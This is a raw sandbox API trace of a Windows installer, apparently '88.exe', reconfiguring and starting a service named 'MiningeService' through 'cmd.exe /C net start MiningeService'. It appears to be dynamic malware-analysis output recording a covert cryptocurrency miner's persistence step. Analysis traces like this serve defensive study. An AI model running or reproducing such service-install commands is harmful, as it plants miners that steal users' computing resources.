[0276.972] lstrlenA (lpString=" ChangeServiceConfig2 SUCCESS\r\n") returned 31 [0276.972] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0276.972] lstrlenA (lpString="ChangeServiceConfig2 SUCCESS\r\n") returned 30 [0276.972] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0276.972] lstrlenA (lpString="hangeServiceConfig2 SUCCESS\r\n") returned 29 [0276.972] lstrcmpiA (lpString1="h", lpString2="\x09") returned 1 [0276.973] lstrlenA (lpString="angeServiceConfig2 SUCCESS\r\n") returned 28 [0276.973] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0276.973] lstrlenA (lpString="ngeServiceConfig2 SUCCESS\r\n") returned 27 [0276.973] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0276.973] lstrlenA (lpString="geServiceConfig2 SUCCESS\r\n") returned 26 [0276.973] lstrcmpiA (lpString1="g", lpString2="\x09") returned 1 [0276.973] lstrlenA (lpString="eServiceConfig2 SUCCESS\r\n") returned 25 [0276.973] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0276.974] lstrlenA (lpString="ServiceConfig2 SUCCESS\r\n") returned 24 [0276.974] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0276.974] lstrlenA (lpString="erviceConfig2 SUCCESS\r\n") returned 23 [0276.974] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0276.974] lstrlenA (lpString="rviceConfig2 SUCCESS\r\n") returned 22 [0276.974] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0276.974] lstrlenA (lpString="viceConfig2 SUCCESS\r\n") returned 21 [0276.974] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0276.975] lstrlenA (lpString="iceConfig2 SUCCESS\r\n") returned 20 [0276.975] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0276.975] lstrlenA (lpString="ceConfig2 SUCCESS\r\n") returned 19 [0276.975] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0276.975] lstrlenA (lpString="eConfig2 SUCCESS\r\n") returned 18 [0276.975] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0276.975] lstrlenA (lpString="Config2 SUCCESS\r\n") returned 17 [0276.976] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0276.976] lstrlenA (lpString="onfig2 SUCCESS\r\n") returned 16 [0276.976] lstrcmpiA (lpString1="o", lpString2="\x09") returned 1 [0276.976] lstrlenA (lpString="nfig2 SUCCESS\r\n") returned 15 [0276.976] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0276.976] lstrlenA (lpString="fig2 SUCCESS\r\n") returned 14 [0276.976] lstrcmpiA (lpString1="f", lpString2="\x09") returned 1 [0276.977] lstrlenA (lpString="ig2 SUCCESS\r\n") returned 13 [0276.977] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0276.977] lstrlenA (lpString="g2 SUCCESS\r\n") returned 12 [0276.977] lstrcmpiA (lpString1="g", lpString2="\x09") returned 1 [0276.977] lstrlenA (lpString="2 SUCCESS\r\n") returned 11 [0276.977] lstrcmpiA (lpString1="2", lpString2="\x09") returned 1 [0276.977] lstrlenA (lpString=" SUCCESS\r\n") returned 10 [0276.977] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0276.978] lstrlenA (lpString="SUCCESS\r\n") returned 9 [0276.978] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0276.978] lstrlenA (lpString="UCCESS\r\n") returned 8 [0276.978] lstrcmpiA (lpString1="U", lpString2="\x09") returned 1 [0276.978] lstrlenA (lpString="CCESS\r\n") returned 7 [0276.978] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0276.978] lstrlenA (lpString="CESS\r\n") returned 6 [0276.978] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0276.979] lstrlenA (lpString="ESS\r\n") returned 5 [0276.979] lstrcmpiA (lpString1="E", lpString2="\x09") returned 1 [0276.979] lstrlenA (lpString="SS\r\n") returned 4 [0276.979] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0276.979] lstrlenA (lpString="S\r\n") returned 3 [0276.979] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0276.980] lstrlenA (lpString="\r\n") returned 2 [0276.980] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0276.980] lstrlenA (lpString="\n") returned 1 [0276.980] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0276.980] lstrlenA (lpString="") returned 0 [0276.980] lstrlenA (lpString="[SC] ChangeServiceConfig2 SUCCESS") returned 33 [0276.980] OemToCharBuffA (in: lpszSrc="[SC] ChangeServiceConfig2 SUCCESS", lpszDst=0x2af040, cchDstLength=0x21 | out: lpszDst="[SC] ChangeServiceConfig2 SUCCESS") returned 1 [0276.980] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x15 [0276.981] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0x15 [0276.983] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x15, lParam=0x0) returned 0x1 [0276.985] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0276.985] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0276.985] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.985] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0276.985] Sleep (dwMilliseconds=0x64) [0277.110] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0277.110] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0277.110] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.110] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.110] Sleep (dwMilliseconds=0x64) [0277.267] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x0 [0277.267] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x0) returned 1 [0277.267] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.267] wsprintfA (in: param_1=0x2d6fc5c, param_2="%d" | out: param_1="0") returned 1 [0277.267] lstrcpynA (in: lpString1=0x2ae414, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0277.267] CloseHandle (hObject=0x21c) returned 1 [0277.267] CloseHandle (hObject=0x218) returned 1 [0277.267] CloseHandle (hObject=0x214) returned 1 [0277.267] CloseHandle (hObject=0x210) returned 1 [0277.267] CloseHandle (hObject=0x20c) returned 1 [0277.267] CloseHandle (hObject=0x1c) returned 1 [0277.268] GlobalUnlock (hMem=0x224003c) returned 0 [0277.268] FreeLibrary (hLibModule=0x2d70000) returned 1 [0277.269] MulDiv (nNumber=53, nNumerator=30000, nDenominator=60) returned 26500 [0277.269] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6784, lParam=0x0) returned 0x6590 [0277.470] lstrcpynA (in: lpString1=0x42a048, lpString2="Start services MiningeService...", iMaxLength=1024 | out: lpString1="Start services MiningeService...") returned="Start services MiningeService..." [0277.470] lstrlenA (lpString="Start services MiningeService...") returned 32 [0277.470] SetWindowTextA (hWnd=0x20324, lpString="Start services MiningeService...") returned 1 [0277.471] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x16 [0277.471] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x16 [0277.473] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x16, lParam=0x0) returned 0x1 [0277.475] MulDiv (nNumber=54, nNumerator=30000, nDenominator=60) returned 27000 [0277.475] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6978, lParam=0x0) returned 0x6784 [0277.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0277.480] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0277.480] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0277.480] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0277.480] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0277.480] MulDiv (nNumber=55, nNumerator=30000, nDenominator=60) returned 27500 [0277.480] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6b6c, lParam=0x0) returned 0x6978 [0277.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0277.481] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0277.481] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0277.481] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0277.482] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll")) returned 0x2020 [0277.482] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0277.482] lstrcpynA (in: lpString1=0x42a048, lpString2="Skipped: ", iMaxLength=1024 | out: lpString1="Skipped: ") returned="Skipped: " [0277.482] lstrlenA (lpString="Skipped: ") returned 9 [0277.482] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 59 [0277.482] lstrcatA (in: lpString1="Skipped: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" | out: lpString1="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0277.482] MulDiv (nNumber=56, nNumerator=30000, nDenominator=60) returned 28000 [0277.482] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6d60, lParam=0x0) returned 0x6b6c [0277.484] MulDiv (nNumber=57, nNumerator=30000, nDenominator=60) returned 28500 [0277.484] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6f54, lParam=0x0) returned 0x6d60 [0277.485] GetVersion () returned 0x1db10106 [0277.485] GetSystemDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0277.485] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0277.485] lstrcpynA (in: lpString1=0x2ae824, lpString2="C:\\Windows\\system32\\cmd.exe /C net start MiningeService", iMaxLength=1024 | out: lpString1="C:\\Windows\\system32\\cmd.exe /C net start MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C net start MiningeService" [0277.485] MulDiv (nNumber=58, nNumerator=30000, nDenominator=60) returned 29000 [0277.486] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x7148, lParam=0x0) returned 0x6f54 [0277.488] lstrcpynA (in: lpString1=0x2aec34, lpString2="/OEM", iMaxLength=1024 | out: lpString1="/OEM") returned="/OEM" [0277.488] MulDiv (nNumber=59, nNumerator=30000, nDenominator=60) returned 29500 [0277.488] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x733c, lParam=0x0) returned 0x7148 [0277.489] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0277.489] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0277.489] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0277.489] lstrcpynA (in: lpString1=0x40a410, lpString2="ExecToLog", iMaxLength=1024 | out: lpString1="ExecToLog") returned="ExecToLog" [0277.490] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 0x0 [0277.494] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x2d70000 [0277.497] GetProcAddress (hModule=0x2d70000, lpProcName="ExecToLog") returned 0x2d7102d [0277.497] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0277.497] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0277.497] GetCurrentProcess () returned 0xffffffff [0277.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d6fb40 | out: Wow64Process=0x2d6fb40*=1) returned 1 [0277.497] FindWindowExA (hWndParent=0x401e4, hWndChildAfter=0x0, lpszClass="#32770", lpszWindow=0x0) returned 0x40300 [0277.497] FindWindowExA (hWndParent=0x40300, hWndChildAfter=0x0, lpszClass="SysListView32", lpszWindow=0x0) returned 0x302f8 [0277.497] lstrcpyA (in: lpString1=0x2af040, lpString2="/OEM" | out: lpString1="/OEM") returned="/OEM" [0277.498] lstrlenA (lpString="/TIMEOUT=") returned 9 [0277.498] lstrlenA (lpString="/OEM") returned 4 [0277.498] lstrcmpiA (lpString1="/OEM", lpString2="/OEM") returned 0 [0277.498] lstrcpyA (in: lpString1=0x2af040, lpString2="C:\\Windows\\system32\\cmd.exe /C net start MiningeService" | out: lpString1="C:\\Windows\\system32\\cmd.exe /C net start MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C net start MiningeService" [0277.498] lstrlenA (lpString="/TIMEOUT=") returned 9 [0277.498] lstrlenA (lpString="C:\\Windows\\system32\\cmd.exe /C net start MiningeService") returned 55 [0277.498] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0277.499] lstrlenA (lpString=":\\Windows\\system32\\cmd.exe /C net start MiningeService") returned 54 [0277.499] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0277.500] lstrlenA (lpString="\\Windows\\system32\\cmd.exe /C net start MiningeService") returned 53 [0277.500] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0277.500] lstrlenA (lpString="Windows\\system32\\cmd.exe /C net start MiningeService") returned 52 [0277.500] lstrcmpiA (lpString1="Windows\\s", lpString2="/TIMEOUT=") returned 1 [0277.500] lstrlenA (lpString="indows\\system32\\cmd.exe /C net start MiningeService") returned 51 [0277.500] lstrcmpiA (lpString1="indows\\sy", lpString2="/TIMEOUT=") returned 1 [0277.501] lstrlenA (lpString="ndows\\system32\\cmd.exe /C net start MiningeService") returned 50 [0277.501] lstrcmpiA (lpString1="ndows\\sys", lpString2="/TIMEOUT=") returned 1 [0277.501] lstrlenA (lpString="dows\\system32\\cmd.exe /C net start MiningeService") returned 49 [0277.501] lstrcmpiA (lpString1="dows\\syst", lpString2="/TIMEOUT=") returned 1 [0277.501] lstrlenA (lpString="ows\\system32\\cmd.exe /C net start MiningeService") returned 48 [0277.501] lstrcmpiA (lpString1="ows\\syste", lpString2="/TIMEOUT=") returned 1 [0277.502] lstrlenA (lpString="ws\\system32\\cmd.exe /C net start MiningeService") returned 47 [0277.502] lstrcmpiA (lpString1="ws\\system", lpString2="/TIMEOUT=") returned 1 [0277.502] lstrlenA (lpString="s\\system32\\cmd.exe /C net start MiningeService") returned 46 [0277.502] lstrcmpiA (lpString1="s\\system3", lpString2="/TIMEOUT=") returned 1 [0277.502] lstrlenA (lpString="\\system32\\cmd.exe /C net start MiningeService") returned 45 [0277.502] lstrcmpiA (lpString1="\\system32", lpString2="/TIMEOUT=") returned 1 [0277.502] lstrlenA (lpString="system32\\cmd.exe /C net start MiningeService") returned 44 [0277.502] lstrcmpiA (lpString1="system32\\", lpString2="/TIMEOUT=") returned 1 [0277.503] lstrlenA (lpString="ystem32\\cmd.exe /C net start MiningeService") returned 43 [0277.503] lstrcmpiA (lpString1="ystem32\\c", lpString2="/TIMEOUT=") returned 1 [0277.503] lstrlenA (lpString="stem32\\cmd.exe /C net start MiningeService") returned 42 [0277.503] lstrcmpiA (lpString1="stem32\\cm", lpString2="/TIMEOUT=") returned 1 [0277.503] lstrlenA (lpString="tem32\\cmd.exe /C net start MiningeService") returned 41 [0277.503] lstrcmpiA (lpString1="tem32\\cmd", lpString2="/TIMEOUT=") returned 1 [0277.503] lstrlenA (lpString="em32\\cmd.exe /C net start MiningeService") returned 40 [0277.503] lstrcmpiA (lpString1="em32\\cmd.", lpString2="/TIMEOUT=") returned 1 [0277.504] lstrlenA (lpString="m32\\cmd.exe /C net start MiningeService") returned 39 [0277.504] lstrcmpiA (lpString1="m32\\cmd.e", lpString2="/TIMEOUT=") returned 1 [0277.504] lstrlenA (lpString="32\\cmd.exe /C net start MiningeService") returned 38 [0277.504] lstrcmpiA (lpString1="32\\cmd.ex", lpString2="/TIMEOUT=") returned 1 [0277.504] lstrlenA (lpString="2\\cmd.exe /C net start MiningeService") returned 37 [0277.504] lstrcmpiA (lpString1="2\\cmd.exe", lpString2="/TIMEOUT=") returned 1 [0277.505] lstrlenA (lpString="\\cmd.exe /C net start MiningeService") returned 36 [0277.505] lstrcmpiA (lpString1="\\cmd.exe ", lpString2="/TIMEOUT=") returned 1 [0277.505] lstrlenA (lpString="cmd.exe /C net start MiningeService") returned 35 [0277.505] lstrcmpiA (lpString1="cmd.exe /", lpString2="/TIMEOUT=") returned 1 [0277.505] lstrlenA (lpString="md.exe /C net start MiningeService") returned 34 [0277.505] lstrcmpiA (lpString1="md.exe /C", lpString2="/TIMEOUT=") returned 1 [0277.505] lstrlenA (lpString="d.exe /C net start MiningeService") returned 33 [0277.505] lstrcmpiA (lpString1="d.exe /C ", lpString2="/TIMEOUT=") returned 1 [0277.506] lstrlenA (lpString=".exe /C net start MiningeService") returned 32 [0277.506] lstrcmpiA (lpString1=".exe /C n", lpString2="/TIMEOUT=") returned -1 [0277.506] lstrlenA (lpString="exe /C net start MiningeService") returned 31 [0277.506] lstrcmpiA (lpString1="exe /C ne", lpString2="/TIMEOUT=") returned 1 [0277.506] lstrlenA (lpString="xe /C net start MiningeService") returned 30 [0277.506] lstrcmpiA (lpString1="xe /C net", lpString2="/TIMEOUT=") returned 1 [0277.506] lstrlenA (lpString="e /C net start MiningeService") returned 29 [0277.506] lstrcmpiA (lpString1="e /C net ", lpString2="/TIMEOUT=") returned 1 [0277.507] lstrlenA (lpString=" /C net start MiningeService") returned 28 [0277.507] lstrcmpiA (lpString1=" /C net s", lpString2="/TIMEOUT=") returned -1 [0277.507] lstrlenA (lpString="/C net start MiningeService") returned 27 [0277.507] lstrcmpiA (lpString1="/C net st", lpString2="/TIMEOUT=") returned -1 [0277.507] lstrlenA (lpString="C net start MiningeService") returned 26 [0277.507] lstrcmpiA (lpString1="C net sta", lpString2="/TIMEOUT=") returned 1 [0277.508] lstrlenA (lpString=" net start MiningeService") returned 25 [0277.508] lstrcmpiA (lpString1=" net star", lpString2="/TIMEOUT=") returned -1 [0277.508] lstrlenA (lpString="net start MiningeService") returned 24 [0277.508] lstrcmpiA (lpString1="net start", lpString2="/TIMEOUT=") returned 1 [0277.508] lstrlenA (lpString="et start MiningeService") returned 23 [0277.508] lstrcmpiA (lpString1="et start ", lpString2="/TIMEOUT=") returned 1 [0277.508] lstrlenA (lpString="t start MiningeService") returned 22 [0277.508] lstrcmpiA (lpString1="t start M", lpString2="/TIMEOUT=") returned 1 [0277.509] lstrlenA (lpString=" start MiningeService") returned 21 [0277.509] lstrcmpiA (lpString1=" start Mi", lpString2="/TIMEOUT=") returned -1 [0277.509] lstrlenA (lpString="start MiningeService") returned 20 [0277.509] lstrcmpiA (lpString1="start Min", lpString2="/TIMEOUT=") returned 1 [0277.509] lstrlenA (lpString="tart MiningeService") returned 19 [0277.509] lstrcmpiA (lpString1="tart Mini", lpString2="/TIMEOUT=") returned 1 [0277.509] lstrlenA (lpString="art MiningeService") returned 18 [0277.509] lstrcmpiA (lpString1="art Minin", lpString2="/TIMEOUT=") returned 1 [0277.510] lstrlenA (lpString="rt MiningeService") returned 17 [0277.510] lstrcmpiA (lpString1="rt Mining", lpString2="/TIMEOUT=") returned 1 [0277.510] lstrlenA (lpString="t MiningeService") returned 16 [0277.510] lstrcmpiA (lpString1="t Mininge", lpString2="/TIMEOUT=") returned 1 [0277.510] lstrlenA (lpString=" MiningeService") returned 15 [0277.510] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0277.510] lstrlenA (lpString="MiningeService") returned 14 [0277.510] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0277.511] lstrlenA (lpString="iningeService") returned 13 [0277.511] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0277.511] lstrlenA (lpString="ningeService") returned 12 [0277.511] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0277.511] lstrlenA (lpString="ingeService") returned 11 [0277.511] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0277.512] lstrlenA (lpString="ngeService") returned 10 [0277.512] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0277.512] lstrlenA (lpString="geService") returned 9 [0277.512] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0277.512] lstrlenA (lpString="eService") returned 8 [0277.512] lstrcmpiA (lpString1="C:\\Windows\\system32\\cmd.exe /C net start MiningeService", lpString2="/OEM") returned 1 [0277.512] GetVersion () returned 0x1db10106 [0277.512] GlobalLock (hMem=0x224003c) returned 0x2af450 [0277.512] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2d6fd20, dwRevision=0x1 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0277.512] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2d6fd20, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0277.512] CreatePipe (in: hReadPipe=0x2d6fd74, hWritePipe=0x2d6fd68, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd74*=0x1c, hWritePipe=0x2d6fd68*=0x20c) returned 1 [0277.513] CreatePipe (in: hReadPipe=0x2d6fd58, hWritePipe=0x2d6fd6c, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd58*=0x210, hWritePipe=0x2d6fd6c*=0x214) returned 1 [0277.513] GetStartupInfoA (in: lpStartupInfo=0x2d6fcdc | out: lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0277.513] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C net start MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c), lpProcessInformation=0x2d6fd34 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C net start MiningeService", lpProcessInformation=0x2d6fd34*(hProcess=0x21c, hThread=0x218, dwProcessId=0xa9c, dwThreadId=0xaa0)) returned 1 [0277.654] GetTickCount () returned 0x1d6239b [0277.654] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.654] Sleep (dwMilliseconds=0x64) [0277.815] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0277.815] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0277.816] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.816] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0277.816] Sleep (dwMilliseconds=0x64) [0277.937] WaitForSingleObject 